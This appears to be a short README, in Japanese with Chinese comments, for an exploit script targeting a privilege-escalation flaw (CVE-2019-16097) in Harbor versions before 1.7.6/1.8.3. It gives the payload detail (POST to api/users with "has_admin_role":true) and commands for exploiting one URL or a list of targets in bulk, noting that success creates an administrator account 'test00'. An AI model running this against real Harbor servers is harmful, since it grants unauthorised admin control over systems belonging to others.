
harbor(<1.7.6/1.8.3) 権限昇格 (CVE-2019-16097)
2019年9月、harborに登録機能を利用して管理者を追加できる脆弱性が発覚しました。登録API api/users を使用し、POSTパラメータに"has_admin_role":true を設定すると、直接管理者を追加できます。 本ツールは単一URLまたは一括検出をサポートします。
python2.7
pip install requests
使用法: python harbor-give-me-admin.py -h

単一URL検出: python harbor-give-me-admin.py -u "https://www.xxx.com/"
//如利用成功,则会添加管理员帐号test00,谨慎操作!

一括検出: python harbor-give-me-admin.py -f urls,txt
//如利用成功,则会添加管理员帐号test00,谨慎操作!
gmail:[email protected]